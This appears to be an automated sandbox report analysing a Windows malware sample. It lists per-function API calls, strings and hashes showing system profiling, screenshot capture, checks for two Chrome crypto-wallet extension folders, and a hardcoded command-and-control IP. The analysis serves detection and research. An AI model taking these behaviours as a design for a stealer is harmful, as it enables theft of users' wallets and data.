Instruction ID: c08a7425d974040af4d4cba042ab3f1f7a166202036e0e7951f8e8249523e7a6
Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
Instruction Fuzzy Hash: CA01E43122020ABFEF12AE51CC44EAA7F6AFF19794F104011BE5815120D776E9B1DBA9

Function 1001098B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 1001099E

Part of subcall function 100108F9: ___BuildCatchObjectHelper.LIBCMT ref: 1001092F

_UnwindNestedFrames.LIBCMT ref: 100109B5

Strings

csm, xrefs: 1001099A, 100109AF, 100109C2, 100109E0, 100109F0
csm, xrefs: 1001098D

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: BuildCatchObject$FramesHelperNestedUnwind
String ID: csm$csm
API String ID: 3487967840-3733052814
Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
Instruction ID: 14b1107ce5288ea1db0b61008beba539b652f12cac3eb1ffe8717002ad162d0f
Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
Instruction Fuzzy Hash: 6701E87550150ABBEF12DF51CC45EAB7E6AEF08390F104010BD9859121DBB2E9A1DBA1

Function 042A41E9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 042A421D
__isleadbyte_l.LIBCMT ref: 042A4250
MultiByteToWideChar.KERNEL32(00000080,00000009,0429A58F,?,00000000,00000000,?,?,?,?,0429A58F,00000000), ref: 042A4281
MultiByteToWideChar.KERNEL32(00000080,00000009,0429A58F,00000001,00000000,00000000,?,?,?,?,0429A58F,00000000), ref: 042A42EF

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a2e5321d14d881ead6f0bd83a25f131926bda11b861c1382244b0588a3a2ffb7
Instruction ID: 5333566ef286df49393a7251ecfe12360bb66b5ec12ac67030194ee82339239a
Opcode Fuzzy Hash: a2e5321d14d881ead6f0bd83a25f131926bda11b861c1382244b0588a3a2ffb7
Instruction Fuzzy Hash: 3C31E731B20256EFEF20EFA4C884DBD3BB5BF05318F0545A9E8549B191DBB0E961DB50

Function 100141E5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10014219
__isleadbyte_l.LIBCMT ref: 1001424C
MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,100013C8,?,grams), ref: 1001427D
MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,100013C8,?,grams), ref: 100142EB

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 66a403b29b51960a59580dd5e22c56c14a98226dd1bf7eee6dd0b04d3ec89fb9
Instruction ID: 9a2e08e8898311d7942999ee4248f65e9f85b56d768c46727ef472f1acbeff64
Opcode Fuzzy Hash: 66a403b29b51960a59580dd5e22c56c14a98226dd1bf7eee6dd0b04d3ec89fb9
Instruction Fuzzy Hash: 0C318931A00296EFDB10DFA4C884AAE7BF5FF05251B5685A9F4649F1A1EB30D9C0DB50

Function 042A37AA Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 042A37B8

Part of subcall function 0429AC8F: __FF_MSGBANNER.LIBCMT ref: 0429ACA8
Part of subcall function 0429AC8F: __NMSG_WRITE.LIBCMT ref: 0429ACAF
Part of subcall function 0429AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0429ACD4

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 71f90c1d93d3610ed76ff0871fb3a3774855346611b6f30d5e51d5061c84d089
Instruction ID: 81b1becdfe518feb54d6b8738fe777cfaaf380fe9fe529e2e0d946d5aea94064
Opcode Fuzzy Hash: 71f90c1d93d3610ed76ff0871fb3a3774855346611b6f30d5e51d5061c84d089
Instruction Fuzzy Hash: 4811C872730311AFEF21AF749C046593BE5BF443A8B204029FC098A590EA34FC51D791

Function 042A1A25 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 042A1A4B

Part of subcall function 042A1877: __fltout2.LIBCMT ref: 042A18A2

__cftog_l.LIBCMT ref: 042A1A71
__cftoe_l.LIBCMT ref: 042A1AA3

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 78f06cdb82fbe453eaf0c22657e0650a4b21dc56bcd6adf89ae4d4ea71f074b2
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 71117B3266014ABBCF125E84CC018FE3F22BF19365F188615FE5859031D232E5B1EB81

Function 10011A21 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 10011A47

Part of subcall function 10011873: __fltout2.LIBCMT ref: 1001189E

__cftog_l.LIBCMT ref: 10011A6D
__cftoe_l.LIBCMT ref: 10011A9F

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: b2deb5109e3459db6c2e92c86942fb6d1a7187026451c9960ed85992b78a3838
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 0711523640514EBBCF569E84DC41CEE3F62FF08294B558515FE2959031C737DAB2AB82

Function 0429B4CC Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0429B4E6

Part of subcall function 0429AC8F: __FF_MSGBANNER.LIBCMT ref: 0429ACA8
Part of subcall function 0429AC8F: __NMSG_WRITE.LIBCMT ref: 0429ACAF
Part of subcall function 0429AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0429ACD4

std::exception::exception.LIBCMT ref: 0429B51B
std::exception::exception.LIBCMT ref: 0429B535
__CxxThrowException@8.LIBCMT ref: 0429B546

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
Instruction ID: 928348326ef8a615e40e1e80118f45af1491790ebecd2f8676413f0ab40277a4
Opcode Fuzzy Hash: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
Instruction Fuzzy Hash: 73F0F43062035AABEF10EB94EC989AD3FFAFF40718F500059F505AA090DB74FE468740

Function 042A0708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 042A0717

Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD

__getptd.LIBCMT ref: 042A0725

Strings

csm, xrefs: 042A0733

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
Instruction ID: e5655a72efa9266c5b66d472dddafca3de6abd4c7057a1ba0f5d0cf50569e784
Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
Instruction Fuzzy Hash: 61012434A20206CBDF38DF65C840BACB7F5AF00355F6849AED880A6690CB30BDA4DE41

Function 10010704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10010713

Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9

__getptd.LIBCMT ref: 10010721

Strings

csm, xrefs: 1001072F

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
Instruction ID: 69e9575505c20a4c0929deabb4f4008ee8848d00d0d14bc8a6ce3e821bcd4481
Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
Instruction Fuzzy Hash: E5012838E053059EDB24CF61D854A9DB7F5EF04391F21492EF4819A695CBB0EDC4DE41

Analysis Process: Fj0RhXL.exePID: 5408, Parent PID: 7572COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	0%
Total number of Nodes:	934
Total number of Limit Nodes:	26

Executed Functions

Function 03D85BF0 Relevance: 109.0, APIs: 42, Strings: 20, Instructions: 482
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

_memset.LIBCMT ref: 03D85C2C
_memset.LIBCMT ref: 03D85C45
_memset.LIBCMT ref: 03D85C55
gethostname.WS2_32(?,00000032), ref: 03D85C63
gethostbyname.WS2_32(?), ref: 03D85C6D
inet_ntoa.WS2_32 ref: 03D85C85
_strcat_s.LIBCMT ref: 03D85C98
_strcat_s.LIBCMT ref: 03D85CB1
inet_ntoa.WS2_32 ref: 03D85CDA
_strcat_s.LIBCMT ref: 03D85CED
_strcat_s.LIBCMT ref: 03D85D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85D33
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85D47
GetLastInputInfo.USER32(?), ref: 03D85D54
GetTickCount.KERNEL32 ref: 03D85D5A
wsprintfW.USER32 ref: 03D85D8C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 03D85D9F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 03D85DB3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03D85E0A
wsprintfW.USER32 ref: 03D85E23
GetForegroundWindow.USER32 ref: 03D85E4C
GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 03D85E63
lstrlenW.KERNEL32(000008CC), ref: 03D85E84
lstrlenW.KERNEL32(00000994), ref: 03D85EE1
GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 03D85F34
GetProcAddress.KERNEL32(00000000), ref: 03D85F3B
GetNativeSystemInfo.KERNEL32(?), ref: 03D85F49
GetSystemInfo.KERNEL32(?), ref: 03D85F51
wsprintfW.USER32 ref: 03D85F87
GetCurrentProcessId.KERNEL32 ref: 03D85F99
GetUserNameW.ADVAPI32(?,?), ref: 03D85FF8
wsprintfW.USER32 ref: 03D8601B
GetFileAttributesW.KERNEL32(?), ref: 03D86027
wsprintfW.USER32 ref: 03D8608A
GetFileAttributesW.KERNEL32(?), ref: 03D86096
GetTickCount.KERNEL32 ref: 03D86116
__time64.LIBCMT ref: 03D86125
__localtime64.LIBCMT ref: 03D8615C
wsprintfW.USER32 ref: 03D86195
GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 03D861AA
GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 03D861B9
GetCurrentHwProfileW.ADVAPI32(?), ref: 03D861C6

Strings

C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\, xrefs: 03D86013
O, xrefs: 03D860E3
kernel32.dll, xrefs: 03D85F14
X, xrefs: 03D860EA
2024. 9.12, xrefs: 03D85EFD
x64, xrefs: 03D85F6E
GetNativeSystemInfo, xrefs: 03D85F0F
M, xrefs: 03D8604A
AppEvents, xrefs: 03D85E6D, 03D85ECA
X86, xrefs: 03D861DE, 03D86200
C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge\, xrefs: 03D86084
X86 %s, xrefs: 03D85F81
1.0, xrefs: 03D85EB0
|, xrefs: 03D860BB
REMARK, xrefs: 03D85EEB
GROUP, xrefs: 03D85E8E
t, xrefs: 03D86051
Network, xrefs: 03D85E76, 03D85ED3
x86, xrefs: 03D85F75, 03D85F7A
%d min, xrefs: 03D85D86

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: wsprintf$Info$ByteCharMultiSystemWide_strcat_s$_memset$AttributesCountCurrentFileTickWindowinet_ntoalstrlen$AddressDirectoryForegroundHandleInputLastLocaleModuleNameNativeProcProcessProfileTextUser__localtime64__time64_mallocgethostbynamegethostname
String ID: %d min$1.0$2024. 9.12$AppEvents$C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge\$C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GROUP$GetNativeSystemInfo$M$Network$O$REMARK$X$X86$X86 %s$kernel32.dll$t$x64$x86$|
API String ID: 1086322084-88797156
Opcode ID: 04d8380a4953b8d18868c01414df80e3155adf7e5ccb578cb4059147533a69a0
Instruction ID: 305e8320ff81ac7bdd670411e9b656b06541c30c503688887aa22c6e16d9ff0f
Opcode Fuzzy Hash: 04d8380a4953b8d18868c01414df80e3155adf7e5ccb578cb4059147533a69a0
Instruction Fuzzy Hash: 1102B5B2900205EFDB14EBA4DC45FEEB7B9FF44700F048659F519A7280EB70A658CBA5

Function 03D86770 Relevance: 88.6, APIs: 45, Strings: 5, Instructions: 1057stringregistrysleepCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(00000000,00000000,2024. 9.12), ref: 03D86796
GetLastError.KERNEL32 ref: 03D8679E
Sleep.KERNEL32(000003E8), ref: 03D867B5
CreateMutexW.KERNEL32(00000000,00000000,2024. 9.12), ref: 03D867C0
GetLastError.KERNEL32 ref: 03D867C2
_memset.LIBCMT ref: 03D867E9
lstrlenW.KERNEL32(?), ref: 03D867F6
lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D8681D
Sleep.KERNEL32(000003E8), ref: 03D86828
GetModuleHandleW.KERNEL32(00000000), ref: 03D86835
GetConsoleWindow.KERNEL32 ref: 03D8683F
_memset.LIBCMT ref: 03D868CD
lstrlenW.KERNEL32(?,74DEE010,74DF2FA0,74DF0F00), ref: 03D868DD
lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D86912
RegOpenKeyExW.ADVAPI32 ref: 03D86941
RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?), ref: 03D8696B
_memset.LIBCMT ref: 03D86987
RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?,?,?,?,?), ref: 03D869A5

Strings

Regex, xrefs: 03D86965, 03D8699F
2024. 9.12, xrefs: 03D8678D, 03D867B7
Uopen, xrefs: 03D868EB
key, xrefs: 03D86802, 03D868F0, 03D8692B
open, xrefs: 03D867FD

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memset$CreateErrorLastMutexQuerySleepValuelstrcmplstrlen$ConsoleHandleModuleOpenWindow
String ID: 2024. 9.12$Regex$Uopen$key$open
API String ID: 615606947-542576200
Opcode ID: 4a392758e6bdeff63860f94ca7075385f6717f9a969d0e2f16ed8b9d7bce668e
Instruction ID: 5d3e0a96ea78bec6a500c0d2c8092d9d5ad0024bd402d42add44aada6066e6ea
Opcode Fuzzy Hash: 4a392758e6bdeff63860f94ca7075385f6717f9a969d0e2f16ed8b9d7bce668e
Instruction Fuzzy Hash: 11925AB1908380DFD734EF28D884A9BFBE5FF89714F54492EE5898B251D730A544CBA2

Function 03D96940 Relevance: 58.1, APIs: 29, Strings: 4, Instructions: 351
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 03D9695F
GetDC.USER32(00000000), ref: 03D9696C
CreateCompatibleDC.GDI32(00000000), ref: 03D96972
GetDC.USER32(00000000), ref: 03D9697D
GetDeviceCaps.GDI32(00000000,00000008), ref: 03D9698A
GetDeviceCaps.GDI32(00000000,00000076), ref: 03D96992
ReleaseDC.USER32(00000000,00000000), ref: 03D969A3
GetSystemMetrics.USER32(0000004E), ref: 03D969C8
GetSystemMetrics.USER32(0000004F), ref: 03D969F6
GetSystemMetrics.USER32(0000004C), ref: 03D96A48
GetSystemMetrics.USER32(0000004D), ref: 03D96A5D
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03D96A76
SelectObject.GDI32(?,00000000), ref: 03D96A84
SetStretchBltMode.GDI32(?,00000003), ref: 03D96A90
GetSystemMetrics.USER32(0000004F), ref: 03D96A9D
GetSystemMetrics.USER32(0000004E), ref: 03D96AB0
StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 03D96AD7
_memset.LIBCMT ref: 03D96B4A
GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 03D96B67
_memset.LIBCMT ref: 03D96B7F
_memmove.LIBCMT ref: 03D96BB9

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

DeleteObject.GDI32(?), ref: 03D96BF3
DeleteObject.GDI32(?), ref: 03D96BFD
ReleaseDC.USER32(00000000,?), ref: 03D96C09
_memmove.LIBCMT ref: 03D96CA3
DeleteObject.GDI32(?), ref: 03D96CAF
DeleteObject.GDI32(?), ref: 03D96CB9
ReleaseDC.USER32(00000000,?), ref: 03D96CC5

Strings

gfff, xrefs: 03D96A08
(, xrefs: 03D96B0E
6, xrefs: 03D96B31
gfff, xrefs: 03D969E0

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memmove_memset$BitmapBitsDesktopModeSelectWindow_malloc
String ID: ($6$gfff$gfff
API String ID: 1260665799-713438465
Opcode ID: edee0e0ab52bb3215aa8b8ae94bc522590de270c444c1b3dad03566e425fd8b7
Instruction ID: e2328644d5abbfe7bc93eb94313ec48fa55425e0f4dc9afd7aa0cd55aa2862de
Opcode Fuzzy Hash: edee0e0ab52bb3215aa8b8ae94bc522590de270c444c1b3dad03566e425fd8b7
Instruction Fuzzy Hash: FDD15DB6E00308EFDB14EFA5E885A9EBBB9FF44700F14452AF505AB340D774A915CBA1

Function 03D98AA0 Relevance: 56.4, APIs: 25, Strings: 7, Instructions: 368
sleepregistrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03D9BC3F: __fassign.LIBCMT ref: 03D9BC35

Sleep.KERNEL32(00000000), ref: 03D98AF4
CloseHandle.KERNEL32(00000000), ref: 03D98B27
GetLocalTime.KERNEL32(?), ref: 03D98B43
wsprintfW.USER32 ref: 03D98B7A
SetUnhandledExceptionFilter.KERNEL32(03D88AB0), ref: 03D98B88
CloseHandle.KERNEL32(00000000), ref: 03D98BA1
CloseHandle.KERNEL32(00000000), ref: 03D98BB6

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

EnumWindows.USER32(03D864F0,?), ref: 03D98D4A
Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03D98D57
EnumWindows.USER32(03D864F0,?), ref: 03D98D6B
Sleep.KERNEL32(00000BB8), ref: 03D98DA2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03D98DEE
Sleep.KERNEL32(00000FA0), ref: 03D98E71
RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 03D98E98
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03D98EB8
CloseHandle.KERNEL32(?), ref: 03D98F0A
Sleep.KERNEL32(000003E8,?,?), ref: 03D98F51
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03D98F7D
CloseHandle.KERNEL32(?,?,?), ref: 03D98F84
Sleep.KERNEL32(000003E8,?,?), ref: 03D98F8F
CloseHandle.KERNEL32(?), ref: 03D98FAD
WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 03D98FD2
CloseHandle.KERNEL32(?,?,?), ref: 03D98FD9
Sleep.KERNEL32(00000000,?,?,?), ref: 03D98FF3
CloseHandle.KERNEL32(?), ref: 03D99011

Strings

45.201.245.153, xrefs: 03D98C66
127.0.0.1, xrefs: 03D98CC4
Console, xrefs: 03D98E82
45.201.245.153, xrefs: 03D98C28, 03D98C70, 03D98CCE, 03D98D92, 03D98E00
%4d.%2d.%2d-%2d:%2d:%2d, xrefs: 03D98B74
IpDatespecial, xrefs: 03D98EB2
45.201.245.153, xrefs: 03D98C1E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandle$Sleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$45.201.245.153$45.201.245.153$45.201.245.153$Console$IpDatespecial
API String ID: 4131110691-3578819082
Opcode ID: d3db9a8f0e8535772a38a391580e267dcdb8bf81ce93be409f2a2d7114c2ef20
Instruction ID: ce5400665dbe6c37c4ddb891a62ff7872ce27bd332981f486a6056183ff68a94
Opcode Fuzzy Hash: d3db9a8f0e8535772a38a391580e267dcdb8bf81ce93be409f2a2d7114c2ef20
Instruction Fuzzy Hash: 2FD1E2B2564342DFD760FF64D884E1BB7B5EB85B04F040A1EF19587385EB709508CB62

Function 03D871C6 Relevance: 42.4, APIs: 21, Strings: 3, Instructions: 394COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 03D87245

Part of subcall function 03D99EF6: __EH_prolog3.LIBCMT ref: 03D99EFD
Part of subcall function 03D99EF6: std::_Lockit::_Lockit.LIBCPMT ref: 03D99F13
Part of subcall function 03D99EF6: std::locale::_Locimp::_Locimp.LIBCPMT ref: 03D99F35
Part of subcall function 03D99EF6: std::locale::_Setgloballocale.LIBCPMT ref: 03D99F3F
Part of subcall function 03D99EF6: _Yarn.LIBCPMT ref: 03D99F55

std::_Lockit::_Lockit.LIBCPMT ref: 03D8725D

Strings

Regex, xrefs: 03D86965, 03D8699F
Uopen, xrefs: 03D868EB
key, xrefs: 03D868F0, 03D8692B

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
String ID: Regex$Uopen$key
API String ID: 3373505166-3242728208
Opcode ID: 53eec328d6743a817cb97f6eb8c25ca1bc770c18f8e613ec4f6012d63ad604b8
Instruction ID: 30a036d46ae9d8bcd1edcdfca3fb477ea0a2b758f65e365b982ec07914ea02a9
Opcode Fuzzy Hash: 53eec328d6743a817cb97f6eb8c25ca1bc770c18f8e613ec4f6012d63ad604b8
Instruction Fuzzy Hash: 35F128B6908380DFD730EF68D884B9FF7E5BB89704F54492EE5898B251D730A544CB62

Function 03D87F70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03D87F94
wsprintfW.USER32 ref: 03D87FA7

Part of subcall function 03D87E40: GetCurrentProcessId.KERNEL32(90594F2A,00000000,00000000,75BF73E0,03DB0AC0,000000FF,?,03D87FB3,00000000), ref: 03D87E68
Part of subcall function 03D87E40: OpenProcess.KERNEL32(00000400,00000000,00000000,?,03D87FB3,00000000), ref: 03D87E77
Part of subcall function 03D87E40: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,03D87FB3,00000000), ref: 03D87E8D
Part of subcall function 03D87E40: CloseHandle.KERNEL32(00000000,?,03D87FB3,00000000), ref: 03D87E98

_memset.LIBCMT ref: 03D87FC2
GetVersionExW.KERNEL32(?), ref: 03D87FDB
GetCurrentProcess.KERNEL32(00000008,?), ref: 03D88012
OpenProcessToken.ADVAPI32(00000000), ref: 03D88019
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03D8803F
GetLastError.KERNEL32 ref: 03D88049
LocalAlloc.KERNEL32(00000040,?), ref: 03D8805D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03D88085
GetSidSubAuthorityCount.ADVAPI32 ref: 03D88098
GetSidSubAuthority.ADVAPI32(00000000), ref: 03D880A6
LocalFree.KERNEL32(?), ref: 03D880B5
CloseHandle.KERNEL32(?), ref: 03D880C2
wsprintfW.USER32 ref: 03D8811B

Strings

-N/, xrefs: 03D880EF
None/%s, xrefs: 03D880E7
NO/, xrefs: 03D880DF

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

